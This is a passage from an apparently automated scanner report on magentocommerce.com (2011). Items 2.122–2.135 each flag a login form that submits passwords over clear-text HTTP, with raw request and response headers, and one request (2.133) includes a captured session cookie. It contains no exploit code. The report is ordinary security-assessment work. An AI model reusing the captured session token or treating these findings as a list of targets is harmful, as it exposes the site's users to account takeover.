Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.122. http://www.magentocommerce.com/product/magento-go

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.123. http://www.magentocommerce.com/product/magento-zend

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.124. http://www.magentocommerce.com/product/mobile

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.125. http://www.magentocommerce.com/product/professional-edition

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.126. http://www.magentocommerce.com/pt_BR

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.127. http://www.magentocommerce.com/roadmap/issue-roadmap

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.128. http://www.magentocommerce.com/ru

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.129. http://www.magentocommerce.com/services

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.130. http://www.magentocommerce.com/services/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.131. http://www.magentocommerce.com/services/course-pricing

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.132. http://www.magentocommerce.com/services/course-schedule

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.133. http://www.magentocommerce.com/services/descriptions

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.134. http://www.magentocommerce.com/services/professional-services

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.135. http://www.magentocommerce.com/services/register-for-training

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
